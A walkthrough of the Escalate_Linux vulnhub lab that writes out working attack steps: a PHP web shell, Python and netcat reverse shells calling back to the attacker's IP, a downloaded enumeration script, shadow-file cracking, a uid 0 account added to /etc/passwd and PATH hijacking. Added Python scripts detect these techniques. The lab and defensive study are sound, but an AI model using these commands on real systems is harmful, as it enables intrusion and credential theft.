
The escalate_linux walkthrough covers the vulnhub machine a beginner ethical hacker should work through to learn Linux privilege escalation. Escalate_Linux level 1 is a vulnhub virtual machine that offers 12 different ways to reach root by leveraging a variety of privilege escalation techniques. It is designed purposefully to showcase different ways to escalate privileges on a Linux host. Overall it is a great exercise because of the variety and scope of the steps needed to fully defeat the machine’s security controls.


Here is an overview of what privilege escalation techniques are used in this tutorial:

  • SUID/GUID Files Exploitation
  • Vim/Nano Escape
  • Crontab Exploitation
  • Weak Passwords Cracking
  • Kernel Exploits
  • Adding New Users to /etc/passwd

Here’s What You Need

  • Escalate_Linux Level 1 Virtual Machine from vulnhub (VirtualBox)
  • Kali Linux Virtual Machine (VirtualBox)

Information Gathering – escalate_linux walkthrough

Start with an nmap scan.

Dirb

Running dirb unfortunately does not return anything useful. Visiting the exposed endpoints on the Apache server turns up nothing to go on at this point.


Gobuster

Running gobuster is like pulling out the big guns. It is a recon tool written in Go, so it is compiled and fast. It turns out to be the trick to finding interesting endpoints on the web server, and these are worth investigating.

I run the following gobuster command. The -x flag tells it to also look for files with the extensions .php and .html.

gobuster dir -w /usr/share/wordlist/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.18 -x .php,.html

Web Exploitation

Going off the endpoint found with gobuster, 10.0.2.18/shell.php, I find a command injection vulnerability: the page hands the cmd GET parameter straight to a system shell, so I can run arbitrary commands on the web server by supplying them in the URL. The following works:

10.0.2.18/shell.php?cmd=ifconfig; ping 10.0.2.18

The reason this is possible is the shell.php file. The Apache web server is hosting this PHP one-liner web shell, shown below.

<?php system($_GET['cmd']); echo '/*pass cmd as get parameter*/' ?>

Now why use Python for the reverse shell? netcat may deliberately not be installed on the remote machine, but Python usually is.

The command cmd=ifconfig; ping 10.0.2.17 works! What else does?
http://10.0.2.18/shell.php?cmd=ifconfig;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.17",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And guess what? Boom! This gets a reverse shell back to my Kali machine without using meterpreter. This matters for those preparing for the OSCP exam, which significantly restricts its use.
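As an added example (not part of the original walkthrough), here is the defender's view of the requests above: a small Python scanner that pulls the query parameters out of Apache access-log lines and flags values containing shell metacharacters or interpreter names, as a shell.php?cmd= request does. The log lines are constructed to mirror the requests in this section; timestamps and byte counts are invented.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Apache common/combined log prefix: host ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Shell syntax and tool names that have no business inside an ordinary query parameter.
SHELL_META = re.compile(r"[;|&`$]|\b(?:sh|bash|python|nc|wget|curl)\b")

def query_params(query):
    """Split a query string on '&' only (never ';') and decode each name and value."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote_plus(name), unquote_plus(value)

def inspect_request(line):
    """Return a finding for one access-log line, or None when it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, method, target, status = m.groups()
    parts = urlsplit(target)
    for name, value in query_params(parts.query):
        value = unquote(value)            # second pass normalises double-encoded payloads
        if SHELL_META.search(value):
            return {"src": src, "method": method, "path": parts.path,
                    "param": name, "value": value, "status": int(status)}
    return None

def scan_access_log(lines):
    """All findings for an iterable of log lines, in log order."""
    return [f for f in map(inspect_request, lines) if f]

# Constructed log lines modelled on the requests made in this walkthrough.
SAMPLE_LOG = [
    '10.0.2.17 - - [04/Jun/2019:15:57:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.2.17 - - [04/Jun/2019:15:57:20 +0000] "GET /shell.php?cmd=ifconfig;%20ping%2010.0.2.17 HTTP/1.1" 200 1432',
    '10.0.2.17 - - [04/Jun/2019:15:58:02 +0000] "GET /shell.php?cmd=ifconfig;python%20-c%20%27import%20socket%27 HTTP/1.1" 200 0',
    '10.0.2.17 - - [04/Jun/2019:15:58:30 +0000] "GET /search.php?q=linux+privilege+escalation HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['src']} {f['method']} {f['path']} {f['param']}={f['value']!r} -> {f['status']}")
```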


The next step is to upgrade to a fully functional shell by using Python’s pty module to spawn a bash shell.

python -c 'import pty; pty.spawn("/bin/bash")'

One of the first objectives is to upload tools to the remote host in order to escalate privileges. The first thing I find is that I do not have write access to the home directory of user5. Writing to /var/tmp, however, goes off without a hitch.

cd /var/tmp 
wget http://10.0.2.17:8000/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh >> lin-enum-output.txt

AutoRecon – escalate_linux walkthrough

AutoRecon is the premier automated scanning tool that I use often. As you use it you come to appreciate how it organizes the artifacts for each host you scan. Organization can become difficult and confusing as a full enumeration and exploitation runs across multiple hosts.

The report directory contains some auto-generated files and directories that are useful for reporting:

  • local.txt can be used to store the local.txt flag found on targets.
  • notes.txt should contain a basic template where you can write notes for each service discovered.
  • proof.txt can be used to store the proof.txt flag found on targets.

github.com/tib3rius/AutoRecon

AutoRecon relies on asynchronous subprocesses to automate recon scanning of hosts.
[*] http found on tcp/80.
[*] rpcbind found on tcp/111.
[*] netbios-ssn found on tcp/139.
[*] netbios-ssn found on tcp/445.
[*] nfs_acl found on tcp/2049.
[*] nlockmgr found on tcp/42977.
[*] mountd found on tcp/43747.
[*] mountd found on tcp/44203.
[*] mountd found on tcp/60243.
[*] netbios-ns found on udp/137.

LinEnum – escalate_linux walkthrough

To run LinEnum on the remote machine I start a Python web server on Kali with python -m SimpleHTTPServer 8000. Then, using wget, I grab the file and write it to the /var/tmp folder.

Kernel

Kernel information is shown here. There is most likely a kernel exploit available for this machine.

SUID

The output for SUID files is shown here. There are a few interesting items that I will definitely look into as a way to escalate privileges.


RW Permissions

The world-writable files are shown below. These are files that any authenticated user can read and write to. I can also see that gcc, wget, and netcat are installed. These will be needed for any kernel exploits and are useful for transferring files to the machine from Kali.


Crontab

The scheduled cron jobs are shown below. There is certainly enough information here to warrant attempting to exploit cron jobs.

NFS Enumeration – escalate_linux walkthrough

I notice there are several mountd services and an NFS service running. Ultimately these prove fruitless in the pursuit of a shell.

mount -t nfs 10.0.2.18:/ /mnt/el1/
mount: /mnt/el1: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

This error is solved by installing the right helper utilities with apt -y install nfs-common.

$ mount -t nfs 10.0.2.18:/ /mnt -o nolock
mount: /mnt: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
$ apt-get install cifs-utils

After installing the NFS helper package on Linux I mount the remote NFS share and continue to search for an entry point. The df output confirms that the remote filesystem “/” is mounted on my local /mnt directory.

# get the wrapper program
$ sudo apt-get install nfs-common

# mount the remote share
$ mount -t nfs 10.0.2.18:/ /mnt -o nolock

# confirm that the share is mounted locally on /mnt
$ df -k
Filesystem     1K-blocks      Used Available Use% Mounted on
udev             1502808         0   1502808   0% /dev
tmpfs             305092      9584    295508   4% /run
/dev/sda1       79980100  32362584  43511740  43% /
tmpfs            1525452      4080   1521372   1% /dev/shm
tmpfs               5120         0      5120   0% /run/lock
tmpfs            1525452         0   1525452   0% /sys/fs/cgroup
Downloads      244912536 216949828  27962708  89% /media/sf_Downloads
tmpfs             305088        16    305072   1% /run/user/130
tmpfs             305088        44    305044   1% /run/user/0
/dev/sr0           83904     83904         0 100% /media/cdrom0
10.0.2.18:/    226639488   5988480 209068800   3% /mnt

SMB Enumeration – escalate_linux walkthrough

Enum4Linux

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

One of the best things about enum4linux is that it can enumerate users over SMB by RID cycling, and these should be active accounts on the machine.

====================================================================
|    Users on 10.0.2.18 via RID cycling (RIDS: 500-550,1000-1050)    |
====================================================================
S-1-22-1-1000 Unix User\user1 (Local User)
S-1-22-1-1001 Unix User\user2 (Local User)
S-1-22-1-1002 Unix User\user3 (Local User)
S-1-22-1-1003 Unix User\user4 (Local User)
S-1-22-1-1004 Unix User\user5 (Local User)
S-1-22-1-1005 Unix User\user6 (Local User)
S-1-22-1-1006 Unix User\user7 (Local User)
S-1-22-1-1007 Unix User\user8 (Local User)

After successfully enumerating some user accounts on the machine I attempt to connect to the shares that I have just enumerated. Ultimately there is nothing to gain from this attempt, so I press forward to more enumeration.

Using smbclient I connect to some of the open shares such as ipc$ and liteshare, but these are not anything remarkable either.

smbclient \\\\10.0.2.18\\ipc$
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> 

Looking for SUID/GUID Files

The first step in Linux privilege escalation is to check for files with the SUID/GUID bit set. Such a file runs with the permissions of its owner or group rather than those of the user who launches it. Searching for them leads to the file script, which is executable by my current user.

$ find / -perm -u=s -type f 2>/dev/null  
/home/user5/script
/home/user3/shell

-rwsr-xr-x  1 root  root  8392 Jun  4 15:57 script

Running the file does not appear to lead to anything of consequence so I press on.

Turns out the file script does not do anything…

Which leads me to try the other interesting file which is shell.

1. Abusing SUID/GUID Files

The first way to escalate privileges to root is simple. Normally you would find it by looking through directories for interesting files, but LinEnum has already done that and listed all the SUID/GUID files. One of them is shell, found in a user’s home directory. Running it opens a bash shell running as root.

Running the file shell gives me root! This is the escalate_linux walkthrough root technique #1.
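A defender's counterpart to the SUID hunt above, added here and not part of the original walkthrough: a Python audit over the output of GNU find that flags setuid/setgid files living outside the usual binary directories (as the shell and script binaries in user home directories do) or writable by others. The sample find output is constructed; the modes of the system binaries are assumed.

```python
# Produce the input on the host being audited with:
#   find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -printf '%m %u %g %p\n' 2>/dev/null

# Where setuid/setgid binaries are normally installed on Debian-based systems.
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")

def parse_find_line(line):
    """Parse one '%m %u %g %p' line into (mode, owner, group, path); paths may contain spaces."""
    mode, owner, group, path = line.rstrip("\n").split(" ", 3)
    return int(mode, 8), owner, group, path

def classify(mode, owner, group, path):
    """Reasons this setuid/setgid file deserves attention (empty list means it looks normal)."""
    reasons = []
    if mode & 0o4000 and owner == "root":
        kind = "setuid root"
    elif mode & 0o4000:
        kind = f"setuid {owner}"
    else:
        kind = f"setgid {group}"
    if not path.startswith(TRUSTED_DIRS):
        reasons.append(f"{kind} binary outside the standard binary directories")
    if mode & 0o022:
        reasons.append(f"{kind} binary is group/world writable (mode {mode & 0o7777:04o})")
    return reasons

def audit_suid(find_output):
    """Return {path: [reasons]} for every suspicious entry in the find output."""
    findings = {}
    for line in find_output.splitlines():
        if not line.strip():
            continue
        mode, owner, group, path = parse_find_line(line)
        reasons = classify(mode, owner, group, path)
        if reasons:
            findings[path] = reasons
    return findings

# Constructed find output modelled on this machine: the two home-directory binaries the
# walkthrough finds, plus ordinary system setuid programs (their modes are assumed).
SAMPLE_FIND = """\
4755 root root /usr/bin/passwd
4755 root root /usr/bin/sudo
2755 root shadow /usr/bin/chage
4755 root root /home/user5/script
4755 root root /home/user3/shell
"""
```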

2. Exploiting Weak Passwords

With root access I now look to start cracking passwords. To do this I list the usernames with cat /etc/passwd and then the password hashes with cat /etc/shadow. The final step is to run john on the hashes to crack them locally on my Kali machine. The resulting password for root is 12345.

This is the escalate_linux walkthrough root technique #2.

3. Exploit Cronjobs

Notice that the file autoscript.sh is scheduled to run every five minutes. It is owned by root, meaning that it runs with root privileges. The file is writable by root, which I already am at this point. The task is to create a command that returns a shell and append it to this file. When the file runs again in five minutes the shell will be running as root, and a root shell is obtained this way.

$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.2.17 LPORT=443 -f raw

$ echo 'mkfifo /tmp/znaiyl; nc 10.0.2.17 443 0</tmp/znaiyl | /bin/sh >/tmp/znaiyl 2>&1; rm /tmp/znaiyl' >> autoscript.sh
Take the output of msfvenom, wrap it in a string literal, and append it to the file with echo.

This is the escalate_linux walkthrough root technique #3.
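The condition technique #3 relies on, a root cron job whose script a non-root user can alter, is something an administrator can check for. Added example, not from the original walkthrough: a Python audit of /etc/crontab-format entries. The crontab text, file paths and modes are constructed, since the walkthrough does not show where autoscript.sh lives or how it is scheduled.

```python
import os
import stat
from types import SimpleNamespace

def parse_system_crontab(text):
    """Yield (user, command) for each job line in /etc/crontab format."""
    for line in text.splitlines():
        fields = line.split(None, 6)              # m h dom mon dow user command
        if len(fields) == 7 and not fields[0].startswith("#"):
            yield fields[5], fields[6]

def audit_crontab(text, stat_fn=os.stat):
    """Return (path, reason) for each root job whose script a non-root user could alter.
    stat_fn(path) is os.stat by default; any object with st_uid and st_mode will do."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        path = command.split()[0]
        if not path.startswith("/"):
            findings.append((path, "relative path, resolved through PATH"))
            continue
        try:
            st = stat_fn(path)
        except FileNotFoundError:
            findings.append((path, "script does not exist"))
            continue
        if st.st_uid != 0:
            findings.append((path, f"owned by uid {st.st_uid}, not root"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((path, f"group/world writable, mode {stat.S_IMODE(st.st_mode):04o}"))
    return findings

# Constructed sample: the paths and modes are invented; the walkthrough does not
# show where autoscript.sh lives or how it is scheduled.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
*/5 *  *   *   *   root   /opt/autoscript.sh
0   3  *   *   *   root   /usr/local/sbin/backup.sh
*/10 * *   *   *   user1  /home/user1/sync.sh
"""
SAMPLE_FILES = {
    "/opt/autoscript.sh": SimpleNamespace(st_uid=0, st_mode=0o100777),
    "/usr/local/sbin/backup.sh": SimpleNamespace(st_uid=0, st_mode=0o100755),
}

def sample_stat(path):
    """Stand-in for os.stat over the constructed sample files."""
    if path not in SAMPLE_FILES:
        raise FileNotFoundError(path)
    return SAMPLE_FILES[path]
```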

4. Exploiting the /etc/passwd File

In Linux, when a new user is created, an entry is made in /etc/passwd, /etc/group, and /etc/shadow. The last of these contains the hashed password of the user. To abuse this process for escalating privileges one needs write access to /etc/passwd. After the initial escalation, either by running shell or by cracking the root password, this is possible because root has permission to edit /etc/passwd.

# generate a password hash for the new user guru (password: iamguru) with OpenSSL
$ openssl passwd iamguru

The new user entry is a complete /etc/passwd line of the form guru:$gurupassword:0:0:root:/root:/bin/bash, where $gurupassword stands for the hash printed by openssl above; uid and gid 0 make the account equivalent to root.

This is the escalate_linux walkthrough root technique #4.
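Added example, not part of the original walkthrough: a Python check that reads /etc/passwd-format text and flags the traces technique #4 leaves behind, namely a second uid 0 account, a hash stored in /etc/passwd instead of /etc/shadow, and malformed entries. The sample file is constructed and the hash is a placeholder, not a real digest.

```python
import re

# POSIX portable user-name characters; a trailing '$' is allowed for Samba machine accounts.
VALID_NAME = re.compile(r"^[a-z_][a-z0-9_-]*\$?$")
# Values that mean "no hash here, look in /etc/shadow" or "login disabled".
SHADOWED = {"x", "*", "!", "!!"}

def audit_passwd(text):
    """Return (line number, message) for each /etc/passwd entry that indicates tampering."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((lineno, f"malformed entry with {len(fields)} fields instead of 7"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not VALID_NAME.match(name):
            findings.append((lineno, f"{name!r}: unusual account name"))
        if pw == "":
            findings.append((lineno, f"{name}: empty password field, no password needed to log in"))
        elif pw not in SHADOWED:
            findings.append((lineno, f"{name}: password hash kept in /etc/passwd rather than /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((lineno, f"{name}: second uid 0 account (root privileges)"))
    return findings

# Constructed /etc/passwd excerpt: line 4 is the kind of entry technique #4 adds (the hash is a
# placeholder) and line 5 is a truncated 6-field entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user5:x:1004:1004:user5,,,:/home/user5:/bin/bash
guru:$1$saltsalt$PLACEHOLDERHASHxxxxxxxxx:0:0:root:/root:/bin/bash
broken:x:1010:1010:/home/broken:/bin/sh
"""

if __name__ == "__main__":
    for lineno, message in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {message}")
```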

5. Escaping vim Editor for Priv Esc

The output from LinEnum from initial enumeration reveals that user8 can run vi with root privileges. Notice that this is perfect for escaping vim in order to escalate privileges.

To escape from vim and escalate privileges, run sudo vi and then, from inside the editor, :!sh to open a root shell.

This is the escalate_linux walkthrough root technique #5.

6. Exploiting PATH Variables

Another way to abuse the SUID files found earlier is through script. Initial enumeration reveals that it runs with root privileges, and since it calls ls by name rather than by absolute path, a file named ls placed in a directory that comes earlier in PATH is what actually runs, as root.

# this would work too, but it overwrites the file
echo 'cat /etc/shadow' >> script
chmod 777 script
./script

The above is possible, but instead of overwriting files this is the non-destructive method to use. The commands below list the contents of /etc/shadow; from there the password can be cracked and I can switch to root.

echo 'cat /etc/shadow' >> ls
chmod 777 ls
export PATH=/var/tmp:$PATH
cd /home/user5
./script
error:
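Technique #6 works because a directory anyone can write to (/var/tmp) sits in front of the system directories in PATH. Added example, not from the original walkthrough: a Python audit of a PATH value that flags writable, relative, missing or non-root-owned entries. The directory modes are constructed, and a trailing "." is appended to the walkthrough's PATH to show that case as well.

```python
import os
import stat
from types import SimpleNamespace

def audit_path(path_env, stat_fn=os.stat):
    """Return (entry, reason) for each PATH directory an unprivileged user could plant a binary in.
    stat_fn is os.stat by default; any object with st_uid and st_mode works."""
    findings = []
    for entry in path_env.split(":"):
        if entry in ("", "."):
            findings.append((entry or "(empty)", "current working directory is searched"))
            continue
        if not entry.startswith("/"):
            findings.append((entry, "relative directory, depends on where the program is started"))
            continue
        try:
            st = stat_fn(entry)
        except FileNotFoundError:
            findings.append((entry, "does not exist, so whoever can create it controls it"))
            continue
        if st.st_uid != 0:
            findings.append((entry, f"owned by uid {st.st_uid}, not root"))
        # The sticky bit (as on /var/tmp) only stops users deleting each other's files;
        # it does nothing to stop a new file called ls being dropped there.
        if st.st_mode & stat.S_IWOTH:
            findings.append((entry, f"world writable (mode {stat.S_IMODE(st.st_mode):04o})"))
        elif st.st_mode & stat.S_IWGRP:
            findings.append((entry, f"group writable (mode {stat.S_IMODE(st.st_mode):04o})"))
    return findings

# Constructed sample: the PATH prefix the walkthrough sets plus a trailing '.', with invented modes.
SAMPLE_PATH = "/var/tmp:/usr/local/bin:/usr/bin:/bin:."
SAMPLE_DIRS = {
    "/var/tmp": SimpleNamespace(st_uid=0, st_mode=0o41777),
    "/usr/local/bin": SimpleNamespace(st_uid=0, st_mode=0o40755),
    "/usr/bin": SimpleNamespace(st_uid=0, st_mode=0o40755),
    "/bin": SimpleNamespace(st_uid=0, st_mode=0o40755),
}

def sample_stat(path):
    """Stand-in for os.stat over the constructed sample directories."""
    if path not in SAMPLE_DIRS:
        raise FileNotFoundError(path)
    return SAMPLE_DIRS[path]
```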